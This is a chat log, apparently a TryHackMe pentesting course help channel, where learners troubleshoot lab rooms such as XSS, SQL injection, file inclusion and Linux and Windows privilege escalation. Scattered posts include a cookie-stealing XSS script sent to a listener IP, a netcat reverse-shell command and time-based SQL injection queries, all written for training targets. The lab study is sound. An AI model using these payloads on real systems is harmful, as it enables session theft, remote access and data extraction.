#junior-pentester-path

1 messages ยท Page 16 of 1

north dove
#

oh come oncmnatic

fallen crater
#

i will never give the flag for this room cause it sucks and everyone should do it lol

alpine sigil
#

ah come on...

north dove
sterile crescent
#

my head is already reeling from even just looking at windows stuff ;-;

north dove
#

@rough ore are u still stuck?cmnatic

north dove
#

dm me

fallen crater
#

try F instead of f

untold cargo
#

anyone here finished the LFI room ?

fallen crater
#

on the service name

untold cargo
#

i'm doing with 2 other friends right now the task 8 and nothing we try is working

mint tree
fallen crater
#

oh sorry i get the version but from control panel

#

open control panel ..you will get it

next lanceBOT
#

Gave +1 Rep to @fallen crater

fallen crater
#

maybe because it is a trivial solution

mint tree
#

anyone else having issues with the final XXS challenge. Site not loading for me

fallen crater
#

yw

alpine sigil
#

cant find it lol what would u name it ?

north dove
alpine sigil
#

freefortnitebucks2021.exe

normal heron
#

same about local files to me

#

blew my mind

#

that i couldnt make it all just yet xd

visual crest
#

basically it'd be part of the path name

north dove
#

I always wonder what's Advancedpepehands

alpine sigil
visual crest
#

that would be very handholdy

alpine sigil
visual crest
fallen crater
# alpine sigil it sounds so obvious.. it is making me doubt myself

just think of this example:

if the service runs under: C:\Hello\welcome all\service.exe

When a system come to execute this service it will open C:, but before opening this folder: welcome all:
it will notice that there is a space between the word: welcome and the word: all, then as it is unqouted path the system will try to run the executable welcome.exe(which is not exists) in the Hello folder, and the system will not find this executable, then it will go to the original service which is C:/Hello/welcome all/service.exe to run it.

all you need to do, is to insert your executable somewhere and with a specific name before the system runs the original service..

alpine sigil
#

I got the idea, but my brain just wont see it.. let me rerereread ist one more time

alpine sigil
#

OH MY GOD

#

im dying

#

it was too easy

#

i should really go to bed

visual crest
#

no its ok, it takes a while to figure out ๐Ÿ™‚

dusky gulch
lusty bolt
#

So, in nmap04, it says "run nmap with -O and TARGET_IP", but if I do that, nmap says the host is down and I should use -Pn? Should it not just work without -Pn?

jade lodge
deft valley
red wraith
#

Hi, I dont get the question on SSRF Task 3:
What website can be used to catch HTTP requests from a server? What website it refers to?

jade lodge
red wraith
#

lol, I must be blind..., thanks

lusty bolt
deft valley
acoustic spindle
#

I'm stuck on Subdomain Enumeration in the Virtual Hosts section where we use ffus and FUZZ and the namelist file to try and find subdomains. When I run the command, it runs through all lines of the name list, but each line just says error and gives no info. Anyone else encounter this?

#

It's like it goes line by line of the namelist and every entry at the end it says error. each line says teh same thing. I think I'm all connected okay

#

just tried. I guess not. Request timed out.

#

So, refresh and try again?

#

attackbox

#

that's what I thought.

#

I'm initializing a different attackbox as we speak, though.

#

ugh, same eexact error. Each line reads:

:: Progress: [150/1907]:: Job [1/1]:: 4 req/sec :: Duration [time] :: Error

#

i just tried to visit the IP in my browser and it said it couldn't be reached.

#

it looks like the site is down maybe? acmeitsupport.thm

idle bison
weak bough
#

is there an issue on the THM network?

oblique sand
#

i don't seem to have any issues

acoustic spindle
weak bough
#

i cant get the site for the box i just spun up to load i can ping the machine but the site will not load

weak bough
#

i am doing the last task for the XSS room

#

the address it gives me returns a 504 error

idle bison
#

I don't know your command as you haven't posted it

weak bough
#

there is no commend to post i am just trying to load the site so i can start ๐Ÿ™‚

acoustic spindle
idle bison
weak bough
deft valley
rough ore
#

in windows prives sc query windefend not working

weak bough
oblique sand
#

Hey guys i am on the Metasploitintro room and the question
What command would you use to clear a set payload?

I can't seem to find the command, not sure if i have overlooked this. any hints?

drifting drum
#

Google it

weak bough
#

the man page can help

drifting drum
#

That too

#

But generaly if you don't know an answer your first step should be google

oblique sand
#

Yeah i had googled it, but nothing was showing that i was looking for

fallen crater
fallen crater
acoustic spindle
oblique sand
#

@fallen crater NGL i forgot about that help page, cheers

idle bison
#

If you can't resolve what you're scanning, your system doesn't know where to send the traffic

#

I can't see your command so I can't tell if that's the case or not.

oblique sand
#

I'll re-read again

idle bison
idle bison
#

Follow those steps and then you will be able to post images

#

!docs verify

tiny bluffBOT
fallen crater
solar ore
#

both last so long

oblique sand
#

@fallen crater I thought i tried the easy options let me try them again

drifting drum
#

Don't post a drive link. If is verified your account then just upload the picture

oblique sand
#

@fallen crater I had the first one but didn't insert the last bit -,- Thanks haha

next lanceBOT
#

Gave +1 Rep to @fallen crater

acoustic spindle
main yew
#

can someone help me with task 13 burpsuite basic?

fallen crater
oblique sand
#

@fallen crater the pentester role come with the title?

main yew
#

i cannot find that file

fallen crater
oblique sand
#

Awesome i got the title but not discord yet

drifting drum
oblique sand
#

Yeah prob update tomorrow

fallen crater
main yew
#

@oblique sand go to the thm bot and type that command for update stats

oblique sand
#

Ahh

fallen crater
#

by typing !verify <your discord token> to the THM bot

main yew
#

@fallen crater can u help me with task 13 burpsuite basics?

oblique sand
#

Iโ€™ll do that cheers

main yew
#

i cannot find the requested file with the flag in site map

fallen crater
main yew
#

ok

#

did u get something ?

fallen crater
#

open all webpages(i.e., home, about, contact, support, product) and let the traffic goes through the proxy without intercept it then go to (Proxy=>http history) on burp suite and you will notice a strange file name see the response you will get the flag

main yew
#

this is all i get

fallen crater
# main yew

you didn't open all the pages i think you missed one or more pages like the support page or the product page i think

main yew
#

i openned all the pages

fallen crater
#

try to go to http history..under the proxy tab

main yew
deft valley
#

does netsecchallenge take taht much time?

fallen crater
fallen crater
# main yew

i think this issue has been finished right ?

mental holly
#

Hey Everyone, I'm looking at the Linux Privilege Escalation:Path task 10. The example uses gcc to compile the executable to run as part of the exploit. The VM associated with the task doesn't have gcc installed. Is there something I am missing? - Never mind, I'm an idiot and missed what I should have been doing. ๐Ÿ˜„

knotty walrus
#

I am solving the Vulnerability Capstone

#

lab and I am stuck

#

can somebody help?

fallen crater
knotty walrus
#

I am having trouble while executing the code

#

can I dm you?

fallen crater
deft valley
#

in netsec, last flag, what percentage is ok to get a flag?

#

its so slow... im at 12%

frozen agate
frozen agate
#

ok

cedar vector
#

good day..apologies for the noob question, but the pentester title obtained in this path, is it temporary?

lavish thorn
lavish thorn
cedar vector
#

copy on this sir werlegion, thank you

fallen crater
knotty walrus
next lanceBOT
#

Gave +1 Rep to @fallen crater

lavish thorn
#

can someone please assist me with the ssrf room task 5 im not understanding how to input the data

lavish thorn
rapid kite
#

Hi all, im doing the burp suite hashing portion

#

Can't seem to get the relevant one that is == to the one given in md5. Tried encode using ascii and base64

#

can anyone point me in the right direction?

lavish thorn
#

cyberchef

rapid kite
fallen crater
rapid kite
#

yeah.. hash them to md5, then i use encode to base64. Tried ascii hex too

#

maybe i misunderstood? So i'm lookg for the one that is the same as 3166226048d6ad776370dc105d40d9f8?

fallen crater
rapid kite
#

yup, last of task 4 ๐Ÿ™‚

fallen crater
#

you have 3 files contain three different values all you have to do is to grab each value and put it in the burp and choose the mentioned hashsum and check the result to see if there is any result matches this value "3166226048d6ad776370dc105d40d9f8"

#

note: here you need to look at the hex values

#

Need a hint ?

rapid kite
#

hold on

#

let me try again hahah

#

I still don't get the same md5

#

but just trying randomly

fallen crater
fallen crater
rapid kite
fallen crater
#

there is a space between each two characters or some spaces from the left to the right like : aa bb n3 dd 88

#

did you mean that one ?

#

it is one step one way. just choose the mentioned hashsum

#

it looks like that

rapid kite
#

urgh

#

sorry, dumb qn. how do you insert a screen shot here?

#

not sure why i can't drag it in here

fallen crater
#

check your keyboard there is a key: PrtScr/SysRq, next to F12, just press on it and get a screen shot and choose copy to the clipboard, then just past it here directly CTRL+v,

if this didn't work try to install any program

crisp gazelle
#

hi

#

same here not able to send ss

fallen crater
crisp gazelle
#

not it's failed to upload

rapid kite
#

OOOO I GOT IT

crisp gazelle
#

ok i have to save

rapid kite
#

Thanks @fallen crater !!

next lanceBOT
#

Gave +1 Rep to @fallen crater

crisp gazelle
#

i send u one ss

#

for that when i am submitting the flag it's showing wrong

#

even it seems right

#

@fallen crater

fallen crater
#

click on the plus sign here

rapid kite
rapid kite
crisp gazelle
#

wow how u did that one

crisp gazelle
#

plz check dm i send u ss

fallen crater
#

you can upload images to imgur and send the link here

fallen crater
rapid kite
fallen crater
crisp gazelle
#

can u access it @rapid kite

rapid kite
#

Nopeee

lavish thorn
#

hello im on task 5 linprivesc room i was wondering if someone would be so kind as to help me find a working exploit and how to upload one it says permission denied every time. when i use find / -perms a=w -user karen -type d 2>/dev/null nothing returns so where can i write the upload

rapid kite
#

out of topic but damn you guys are fast.

crimson lark
#

Has anyone done the sql injections

#

???

drifting drum
#

Yes

#

What do you need help with?

modest arch
#

Hey, in task 11 of linux priv esc i mounted the nfs share on my attaching machine where i compiled the c program, so i'm supposed to find that file in the target machine in the same directory as the mounted share but i don't seem to find anything, anyone go an idea

crimson lark
drifting drum
#

Well, what have you tried so far?

crimson lark
drifting drum
#

Show me your command

crimson lark
#

admin123' UNION SELECT SLEEP(5),2 where database() like 'sql_M%';--

#

If I delete the M i'm getting a success

#

I just can't enumerate anything beyond this

drifting drum
#

Try again

#

You're on the right track

#

You missed something

#

Oh wait

#

Actually

#

The database name isn't just sql

#

There's more to the first part of the name

crimson lark
#

Im stuck at 'sql_'

#

I can find what goes next

#

can't

drifting drum
#

Get rid of the _

lavish thorn
#

how do i upload a exploit to the machine if the permissions wont let me in the linprivesc

drifting drum
#

You missed somethinf

crimson lark
#

Why does it give me a success then? Task 8 Time-based

drifting drum
#

No idea

#

Could be that there's more than 1 database

#

But I'm telling you right now, you missed a letter before the _

lavish thorn
crimson lark
drifting drum
modest arch
#

and use wget to get the exploit file from ur attacking machine to the target

drifting drum
#

Then use wget from the target to download the file

lavish thorn
drifting drum
#

You likely don't have write perms for the directory your in

drifting drum
lavish thorn
# drifting drum Move to /tmp

i was able to get the file uploaded but im not sure if it is the correct exploit and if it is i dont no if the code needs to be altered to work because i keep getting errors

drifting drum
#

What errors are you getting?

#

It's very hard to diagnose errors without seeing the actual error message

lavish thorn
drifting drum
#

Ah rip

normal heron
#

Does anyone know about Task 8 of Practical Example (Blind XSS)? Do I have to specify a port from a target website port or netcat one?

opal stirrup
normal heron
#

Im trying to get the cookie thingy

#

For the last answer

#

Of the last task

opal stirrup
#

I know a lot of people had trouble using nc on that room, I ended up having to reload and just use the THM catcher

normal heron
#

Ok

#

I opened it but i have no idea how THM catcher works

#

I also tried to setup a payload in html

#

But for some reason it didnt worked

#

It just rolled back

#

Dont know what did i do wrong tbh

jolly vine
#

Anyone willing to give some tips on the LFI challenge 1 on task 8? I've seen the responses for people stuck and it mentioned changing the method. I've changed the method to to POST and giving different path names, but it never returns the flag. Any hints?

main dune
#

what are you using to POST the data

jolly vine
main dune
#

try learning how to send POST data with curl; the web fundamentals room is a good place to learn curl

jolly vine
opal stirrup
#

@jolly vine Inspector worked for me, what are you querying?

main dune
#

tbh not sure - im not very good with burp

jolly vine
gloomy crescent
opal stirrup
#

@jolly vine Where is that being inputted?

jolly vine
jolly vine
opal stirrup
#

You don't need burp for that challenge also

gloomy crescent
jolly vine
#

Thanks @gloomy crescent

next lanceBOT
#

Gave +1 Rep to @gloomy crescent

jolly vine
#

Thanks @opal stirrup !

opal stirrup
#

You got it now? Congrats!

mellow karma
#

I am still stuck and confused

#

Can anyone help me with this task 8 challege ?

#

challenge *

#

File Inclusion

modest arch
#

Which one?

woven siren
#

can anybody tell me how to do the task 5 of command injection\

hoary socket
coral oar
#

i need help with burp intruder task 11...its giving me error abt invalid number settings

grave crater
#

Hi everyone, in windows privesc room, dll task, I can't make it work :

Launch room
From open VPN kali
Build dll as instructed + code from hint to change Jack user pwd
Wget dll
Put dll into temp
Open cmd type commands (the servive isn't started, so only start worked)
Go to jack directory
Windows ask login
Type pwd put into dll
Not working...

I tried to restart the box several times
I tried to re stop and start the service, but sys won't let me stop dllsvc

grave crater
#

Nevermind found it, I changed the password of Administrator instead of jack, and it worked ๐Ÿ™‚

subtle herald
#

Hi, I literally know nothing about hacking but I'm willing to learn because it sounds fun, I really need someone to teach me how to hack and what web to use aka step by step and I will be thankful.

wild sundial
#

yeh following the pathways might help u abit

subtle herald
#

Where

#

Sorry tho

#

I am beginner

modest arch
#

Hey Hi, just wondering if anyone can help me in SQL INJECTION task 8 Blind SQLi - Time Based
so i've got table schema and table name
now i'm trying to find out the username
is that correct?
if anyone can type in pvt please

wild sundial
#

better find the colum names before that

dry quartz
#

On XSS,room the final task. I already capture the cookie using netcat and thm catcher and decoded it but when i paste the answer its saying i get the wrong answer. I don't know if i'm still the right thing tho lol

wild sundial
solar ore
#

Can someone let me know if it normal that the hydra brute force lasts longer then 30 mins for the Net Sec Challenge for question "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"

visual crest
#

the brute force should take a minute or 2, its really quick

wild sundial
modest arch
#

Can I get help with SQLi task 8

solar ore
#

Can I ping my command to any of you for a check? .

modest arch
#

||admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four and WHERE table_schema like 'a%';-- || got this for sqli task 8, but no matter what i do for table_schema it doesn't find anything

slow dagger
red wraith
#

and, for reference, the previous task shows you the commands, you have ust to add the "SLEEP()" in the middle

knotty walrus
#

Nmap Advanced Port Scans

modest arch
#

ye got it working

knotty walrus
#

can somebody help me with the task 5

modest arch
#

turns out i misspelled something when i changed the sql

junior canyon
#

I have a question about, ||"Make sure you leave the two blank lines at the bottom of the request!"|| why is this a necessity?
Additionally, is there a list for weird request headers which can be used for testing stuff (as stated in Task 5 of Burp Suite: Repeater) or stuff like that can be random ?

loud spire
#

i am inside the C:\Windows\system32>

#

i am looking for flag.txt

#

how to find ?

modest arch
#

I got this now ||admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'analytics_%';--||

#

Can't find the next letter or number for it tho

kindred lantern
#

Right path but wrong table lol

modest arch
#

wait what

red wraith
#

and maybe there is not a "next letter" on this word

#

you have discovered one table

kindred lantern
#

there's more than jus one table

red wraith
#

but there are at least another one

modest arch
#

aha theres a %

#

wait so im on the complete wrong path

kindred lantern
#

Yeah you can get the name of tables then tag the onto the end of ur command tho so u can search for another.

kindred lantern
#

Enumerating wrong table

red wraith
#

well, you should step back if this is not the table you need, begin again from "a%', change it to 'b%', 'c%'...

#

eventually you will find the table you need. Some people have automated this

modest arch
#

time to figure out how to automate it

#

Also can i get a nudge onto the right table if the one im in is incorrect

#

wait is the table i need start with ||users||?

red wraith
#

the example is pretty similar to the previous one, so the idea is the same, find username and password by guessing one by one the characters. So, you may suppose the table name. Another helpful topic if you do it manually: How would you check that this is table name and no character left? Build this query from the one you have now

noble rose
#

Man what's up with the tickets always being the same, after 8 rooms all the same

modest arch
#

SQLi is a pain, itll be faster learning to automate it

red wraith
modest arch
#

So users I believe is the full name of the table

loud spire
#

how to run ELF file

#

to obtain reverse shell ?

red wraith
#

not technical question: I have received one Throwback voucher. In case I get three of them, what are they for?

loud spire
red wraith
#

I am still on burp room, maybe tomorrow I'll reach it ๐Ÿ˜„

wild sundial
loud spire
#

i have tried x86 as well as x64 payload

wild sundial
red wraith
next lanceBOT
#

Gave +1 Rep to @wild sundial

wild sundial
remote estuary
#

need help on task 12 linux priv escalation

loud spire
remote estuary
#

i think i need to exploit the suid binary, but i'm stuck

wild sundial
solar ore
#

I'm running the command with -L user.txt where both usernames are in

wild sundial
loud spire
#

yes i just did that.

loud spire
#

instead of linux/x86/meterpreter/rev_tcp i was using linux/x86/meterpreter_rev_tcp

remote estuary
bitter snow
#

I need someone to eyeball my cookie fetch script for Task 8 of XSS. I am not getting any response on my listener. </textarea><script>fetch('http://10.13.26.99:4455?cookie=' + btoa(document.cookie) );</script> I fear it is something very basic, but I am not sure. I also don't know how to black anything out like a hint.

bitter snow
#

yes

#

using my Tryhackme VPN

red wraith
#

what is your host IP on VPN?

bitter snow
#

VPN is the 10.13.26.99

#

I can ping both the machine and the VPN

#

yes, it is the port I normally practice with.

mortal latch
#

I'm not getting a reverse shell while exploiting cronjobs in Linux PrivEsc. Am I doing something wrong?

red wraith
#

not sure if second slash is needed, between port and ?cookie

bitter snow
mortal latch
#

OMG! ES

#

YES*

wild sundial
mortal latch
#

I had to use Chmod. Totally didn't see the permissions. Thank you @modest arch

next lanceBOT
#

Gave +1 Rep to @tulip elm

lusty bolt
#

I'm trying to use the EternalBlue exploit for https://tryhackme.com/room/metasploitexploitation and msf keeps saying: [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

bitter snow
noble rose
#

Guys, hello, in Burpsuite:Repeater

In the practical challenge, it says to change the number at the end of the request to extreme inputs

#

What is considered an extreme input

lusty bolt
#

very high

#

999999999999999

red wraith
#

or very low

lusty bolt
#

yeah

noble rose
#

Alright let me try

#

It's always replying normally

wild sundial
#

try negative

noble rose
#

Im putting like this

lusty bolt
#

like what

red wraith
#

lower than 0...

wild sundial
#

-69

red wraith
noble rose
#

Sending pic

#

Ahhh

#

AHHHH YESS

#

Fuck my bad

noble rose
#

I see it

wild sundial
#

cant u just use the module?

bitter snow
lusty bolt
#

oh okay

#

np

noble rose
#

Why do i keep getting already gotten tickets, it's been like that 7 rooms in a row

#

Why

#

Who programmed this

wild sundial
lusty bolt
#

I am

dire crypt
#

Hi team....just wanted to check...any idea what is this pentester title in this path...i mean once we have redeemed it, what happens?

noble rose
dire crypt
noble rose
#

Sooo the number of 3 months voucher decreases? Cmonnn mannn

#

I need to be quick to get something? Not fair

#

Wow

#

Same man

#

It sucks

#

Im busting my ass here

wild sundial
#

damn i hvent got even one eJPT

#

such a huge bad luck

earnest shell
#

Hi guys where can I get help on jpg-getting a error

#

Jpp

noble rose
#

I definitely learned alot, but like damn would be nice to get a good reward

earnest shell
#

How long does it take to finish?

#

I'm still on task 3

#

Sorry I mean room 3 task 3 of jpp

mystic fulcrum
#

Can anyone give me a hint for File Inclusion room

#

I am not able to find Flag2

earnest shell
#

I need help on authentication bypass task 3, trying to brute force but getting a error in terminal

red wraith
lusty bolt
# lusty bolt anyone know?

Now I'm getting this error...

[-] 10.10.58.136:445      - Rex::ConnectionTimeout: The connection with (10.10.58.136:445) timed out.
[*] 10.10.58.136:445      - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.58.136:445 - The target is not vulnerable.```
#

target

mystic fulcrum
red wraith
#

yes, but, where are you stuck?

mystic fulcrum
#

I changed cookie value from Guest to admin in burp, then I see Welcome to admin page, get your flag

lusty bolt
#

yeah

red wraith
#

and see what happens

lusty bolt
#

Yeah

#

Oh, wait. Is it because I'm using WSL2

rapid kite
#

Hello, just a quick question. What do they mean by "reverse dns"?

idle bison
#

ip->name instead of name->IP

wild sundial
#

weird. not getting reverse shell in crontab task. i also gave +x perm to the sh file, wrote exactly as what the task described.

north dove
#

Linux Privesc, Task 10 : I guess i'm unable to understand the process. Can anybody help!

mystic fulcrum
red wraith
#

now you have a hint on what shows depending on what you enter on the cookie

rapid kite
#

merci beacoup!

red wraith
# mystic fulcrum no

if you enter admin, what is shown on the page? If you enter a not valid thing, it shows you an error with some interesting data: From where it includes the data. From here, you can test and play with the cookie

wild sundial
red wraith
wild sundial
#

not getting reverse shell back

red wraith
#

but, the cause, if you have all well configured on the cron tab abuse

unborn jewel
#

have the same issue

rotund fox
#

anybody tried to get a shell on the Command Injection machine? I made sure outbound port wasn't blocked using telnet, I've checked in the bin directory to make sure the binary I wanted were there. First I've tried some bash payload but the & are getting truncated (since it's used for query string parameter I guess), I've also used this nc payload ||;/bin/nc -e /bin/sh (tun0 IP) 1234 (replacing space with url encoding %20)||.
For listener I used ||nc -l -p 1234 -vvv||, anything else I could have tried?

wild sundial
# unborn jewel tried itbut didnt work

all you have to do is replace the file with the rev shell code with the correct ip and port, give exec permission and listen to it.
worked for me aftering terminating and restarting the process.

modest arch
unborn jewel
#

put admin not admin123

modest arch
#

Still getting the same error

#

saying collumn_name not found but thats what I'm trying to find

#

as the same thing works for task7

red wraith
#

then change 'a%' to 'b%'...

modest arch
#

been trying that

red wraith
#

I made at least one similar mistake yesterday. I'll give you a hint first. On Task 7, check this and previous step. the query you send has a difference apart from the new COLUMN_NAME part, check it

lusty bolt
next lanceBOT
#

Gave +1 Rep to @red wraith

modest arch
#

turned out I didn't change a tiny bit

visual crest
lusty bolt
#

Oh, I see

visual crest
#

that exploit is real finicky

next lanceBOT
#

Gave +1 Rep to @visual crest

modest arch
next lanceBOT
#

Gave +1 Rep to @red wraith

red wraith
modest arch
#

yep

lusty bolt
wild sundial
#

have u set all required options?

lusty bolt
#

Yes

modest arch
#

Room File Inclusion challenge last task... Can anyone help me finish

visual crest
lusty bolt
#

Sure, gimme a sec

visual crest
#

it ran on the first time for me and I felt like I won a prize

visual crest
steel ice
modest arch
#

yes i did this

lusty bolt
steel ice
loud spire
#

linux priv esc. task 2 What Linux is this?

#

how to find that i just know that it's ubuntu

iron vale
loud spire
#

o

#

ok

#

thank you @iron vale

next lanceBOT
#

Gave +1 Rep to @iron vale

iron vale
lusty bolt
#

I'll try that

visual crest
lusty bolt
#

Well. Because it's WSL2, it's the IP of that

#

I tried with the IP of my windows PC with WSL2 on it, and it said it couldn't bind to the IP I gave

visual crest
#

it should be the IP of your THM VPN

#

are you VPNing within WSL?

lusty bolt
#

No

#

Should I

visual crest
#

yes

lusty bolt
#

I've never had to do that before for any of the other rooms, but sure

visual crest
#

you should be doing your VPN within Kali/attack machine but also like Neo said, if you have SMBUser/Pass, you should fill that in

#

(honestly for security reasons, not that I don't trust people who use THM - aspiring hackers, I'd never VPN from my host machine)

lusty bolt
#

I thought you meant on my Windows PC, which, like I said, has worked for all the other rooms

idle bison
#

Running and running within WSL are two different things

loud spire
#

how to complete task 5 of linux priv esc

#

i am unable to find an exploit

#

the flag is in front of me, but i don't have permission todisplay it ๐Ÿ˜†

visual crest
lusty bolt
#

I have no idea what that means ๐Ÿ˜“

visual crest
#

you are using meterpreter/reverse_tcp instead of meterpreter_reverse_tcp

lusty bolt
#

Oh

visual crest
loud spire
#

it's in C programming lang.

visual crest
#

yeah you compile it with cc

loud spire
#

gcc man

modest arch
next lanceBOT
#

Gave +1 Rep to @steel ice

loud spire
#

not cc

visual crest
#

on the system

modest arch
#

miracle โค๏ธ

idle bison
visual crest
#

not a man... but you are the one getting compile errors ๐Ÿ™‚

loud spire
#

do

visual crest
loud spire
#

further so that i can get escalated

loud spire
lusty bolt
#

Oh

#

It worked

visual crest
visual crest
lusty bolt
#

Thanks @visual crest @modest arch

next lanceBOT
#

Gave +1 Rep to @visual crest

visual crest
#

yeah its the silly little things

loud spire
lusty bolt
idle bison
#

Matching the payload with what you've generated and what metasploit is listening for is crucial

loud spire
#

one code is throwing 2 error while the other is throwing multiple errors

idle bison
#

!docs verify

tiny bluffBOT
idle bison
#

If you follow those steps, you can post a screenshot for Zojja. Will make it much easier to help.

loud spire
visual crest
#

you could provide screenshot, also verify that you are compiling on the system you are trying to compile on

loud spire
#

ok

visual crest
#

I would ignore warnings if it compiles

#

thats what most programmers do...

loud spire
#

yes u r right both the programs are throwing warning, not error

#

mount failed..
couldn't create suid ๐Ÿ˜ฆ

#

the output

modest arch
#

I've been trying the whole night and this morning on the task 11 of linux priv esc it's simple i just mount a share on my local machine then make my exploit on there and i'm supposed to find it shared of the directory in the target machine but whenever i check the target machine nothing was created, anyone faced this, it's really annoying

loud spire
#

the second code is showing this output:

#

spawning threads
mount #1
no FS_USERNS_MOUNT for overlayfs on this kernel
child threads done
exploit failed

visual crest
loud spire
#

ok

rapid kite
#

is it me or is network security hard..

loud spire
rapid kite
visual crest
visual crest
loud spire
#

3.13.0-24-generic <-- the version

#

of kernel

rapid kite
modest arch
#

i tried with all

#

each time but no chance

loud spire
visual crest
loud spire
#

@visual crest

coral oar
#

how do i fix this

visual crest
modest arch
loud spire
#

yes

#

it is

visual crest
#

don't make me boot up this sytem...

#

I don't remember the kernel exploit being Ubuntu

idle bison
# coral oar

A good first step would be a screenshot rather than a picture of a screen

loud spire
#

i am really stuck

modest arch
#

yup i created a directory mounted it to a share and then created the file in that directoruy which i mounted with the share

visual crest
visual crest
loud spire
#

why is it showing i don't have permission to attach file

#

??

visual crest
#

I'm trying to exploit the system, I didn't copy the exploit to my system so I dont remember which one I used

modest arch
#

i still find nothing in the share

visual crest
#

Kernel exploit

visual crest
# modest arch

well on the target system, you don't have access to /home/ubuntu do you?

modest arch
#

i tried even with /tmp same thing

visual crest
modest arch
#

i feel the mistake is somewhere in mount command but it's not outputting any error

visual crest
#

try tmp

#

humor us ๐Ÿ™‚

#

yeah I think all of them do but you can only access 1 of them on the target system

modest arch
#

yes

#

all 3 of them do

#

there is acutally a question about that and i did answer it

#

also same

#

i would reboot

visual crest
#

might want to just restart from scratch, try it again, use /tmp

modest arch
#

actually

#

lol

#

when i logged again in target machine

#

i could see all file being shared

#

even in the other directory

#

guess it had to be refreshed or sth

#

thanks for help)

visual crest
#

no prob

north dove
#

my terminal freezes whenever i do the NFS privesc

#

is it a network issue?
btw, i use virtualbox as 2GB ramcri

shut forum
#

Heho, i need help with "Authentication Bypass" Task 3 "Brute Force" :/ I tried it exactly like described, then with Burp, then with a bigger wordlist rockyou and so on. I always only get back the 200 status code. He just doesn't find any working combination ๐Ÿ˜„

visual crest
visual crest
shut forum
#

i tried both kali vm and attack box, and i used the result from the task before. it is working because i see it at the result of tries (always x4).

visual crest
#

the wordlist they provide should work

#

I mean its a super simple password

shut forum
#

Yeah, it should be so simple :/

visual crest
shut forum
#

It is the exact command executed within the Attackbox ๐Ÿ˜„ All 400 combinations are tried and he only finds 200 status code

visual crest
#

sorry attackbox was for einst3in

north dove
#

@visual crest is CISSP too hard?

shut forum
visual crest
north dove
#

I'm probably goin for something tough after oscp

visual crest
red wraith
shut forum
north dove
visual crest
#

!docs verify

tiny bluffBOT
red wraith
#

to rst?yes. For OSCP, I finished lab time yesterday, I have a month to the exam. Will prepare BoF next 2 weeks, and do some machines on my own. I think that I should be prepared, but we'll see

north dove
red wraith
#

well, I think that there is plenty of people here with more expertise than me. If you are beginner and can not dedicate much time, go to he new learn options or at least three months of lab. I have done and documented exercises to get some extra points on exam, and to have some review/idea, followed a lot reddit/r/oscp ... There you may find some good resources and indications as TJ Null's list to machines to do before the exam

shut forum
shut forum
next lanceBOT
#

Gave +1 Rep to @visual crest

visual crest
#

there are plenty of blogs and what not on how to prep for OSCP

red wraith
#

I did eJPT last year, and another one quite similar, not famous, spanish one, and keep feeling a total beginner

remote estuary
#

need help on linux priv esc task 12, what vulnerability can i exploit?

remote estuary
#

PATH, SUID, sudo, cronjobs, nfs didn't work

visual crest
#

they didn't?

#

there is one thing in that list that will get you to the first step

remote estuary
visual crest
#

yes

#

or at least thats a good path to explore ๐Ÿ™‚

remote estuary
#

base64 to get the missy's ssh?

wild sundial
#

how can i solve "mount.nfs: Protocol not supported" whenever i mount
nfs taking too long NotLikeThis

visual crest
#

did you try it?

wild sundial
visual crest
remote estuary
visual crest
#

and why -t nfs ?

#

I mean I'd try the exact command shown in the explanation

wild sundial
#

ahh imma try it again
thanks both of u

remote estuary
north dove
visual crest
#

before DMing

remote estuary
next lanceBOT
#

Gave +1 Rep to @visual crest

north dove
#

Linux Privesc Task 11 NFS. Unable to see the created file in the mount

#

I just created a file in my share, but can't see the file in the victim's shared folder

visual crest
north dove
#

mount -o rw 10.10.226.13:/home/ubuntu/sharedfolder /home/root/bakuphere

visual crest
#

do you have access to /home/ubuntu/sharedfolder on the target system?

north dove
#

yes

visual crest
#

you do?

north dove
#

umm! ? u mean?

#

didn't get u

#

well i can cd to /home/ubuntu/sharedfolder

visual crest
#

I mean if you are on target system and cd to /home/ubuntu/sharedfolder and type 'pwd', what do you get?

#

yes

north dove
#

yeah i can access

visual crest
#

I might have to boot up this system to try it out

#

can you screenshot?

north dove
#

yeah! wait

#

there u go

visual crest
#

ok weird...

#

wait... do ls -ld . on the /home/ubuntu/sharedfolder

#

'ls -ld .'

#

or ls -ld /home/ubuntu/sharedfolder

north dove
visual crest
#

ok weird I am gonna try this

#

can you try to use /tmp instead of /home/ubuntu/sharedfolder

north dove
#

yeah! my terminal was just freezed that's the reason i switched ot sharedfolder lol

#

wait still! lemme do it again

visual crest
#

because I swore when I did this, I couldn't get to that directory at all but you can and you can read it

north dove
#

can't see the file

#

lol

visual crest
north dove
#

yeah sure

#

I had also restarted the target machine. But i get the same issue

visual crest
#

I mean that looks all ok

north dove
#

Feels like i need one more restart pikapika

#

lol

#

idk why it isn't workin on me thenNotLikeThis

visual crest
#

reboot your own system too

north dove
#

you found a mistake?pepega

#

go on

#

makes sense

visual crest
#

oh! yes

#

good eyes

north dove
#

but why do i feel i also did that

#

wait lemme see once again

#

okay ๐Ÿ˜„

proven glen
#

hey in File inclusion when i upload from my apache server it gives my own shell.
How can i get victim's shell????

main yew
#

guys, what is throwback ?

#

and what can i do with it ?

red wraith
#

did you win it?

main yew
#

i need one more card

#

oh, ok thanks

proven glen
#

No

north dove
#

tryin...my system is damn slow

#

no! i didn't ! i have an intel pentium cri

#

loll! i think you were right! But i remember i actually did the same as u said before but no change.

idk how it worked now!

No idea what's happening with me and my systempepehands

#

haha ! lol

proven glen
#

Is this correct ?
/playground.php?file=http://<kali_ip>/shell.php

lusty bolt
#

I'm stuck on this question of the metasploit: exploitation room

#

I don't know how to do that

#

The hint doesn't help me

north dove
lusty bolt
#

I don't know how to do that

#

I tried running that command in the reverse shell and it said not recognised as an internal or external command

#

I don't have a meterpreter prompt

#

I just have a reverse windows shell

north dove
north dove
#

?

north dove
# lusty bolt I just have a reverse windows shell

